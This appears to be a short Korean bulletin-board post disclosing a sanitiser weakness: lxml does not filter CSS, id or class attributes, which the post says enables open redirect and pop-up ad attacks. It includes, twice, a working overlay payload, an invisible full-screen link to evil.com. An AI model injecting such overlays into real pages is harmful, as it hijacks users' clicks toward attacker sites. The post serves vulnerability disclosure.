CSS, ID, CLASS misconfigure로 인한 취약점
lxml은 css 및 id, class 부분을 필터링 하지 않기 때문에 이를 조합하면 Open redirect, 광고 사이트 popup 등의 취약점이 발생될 수 있습니다.
영상에서 사용한 페이로드 입니다.
`<a href="https://evil.com" class="win_password_lost"
style="position:absolute; top:0; left:0; width:100%; height:100%; opacity:0.001; z-index:9999;">
Click me
</a>
`
https://github.com/user-attachments/assets/8b5f5ac9-d4b9-48e8-89e5-8077204f901f
영상에서 사용한 페이로드 입니다.
`<a href="https://evil.com" class="win_password_lost"
style="position:absolute; top:0; left:0; width:100%; height:100%; opacity:0.001; z-index:9999;">
Click me
</a>
`
https://github.com/user-attachments/assets/8b5f5ac9-d4b9-48e8-89e5-8077204f901f
게시글 목록
| 번호 | 제목 |
|---|---|
| 329 | |
| 326 | |
| 325 | |
| 324 | |
| 323 | |
| 319 | |
| 318 | |
| 314 | |
| 313 | |
| 310 | |
| 309 | |
| 307 | |
| 306 | |
| 305 | |
| 304 | |
| 303 | |
| 302 | |
| 301 | |
| 300 | |
| 299 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기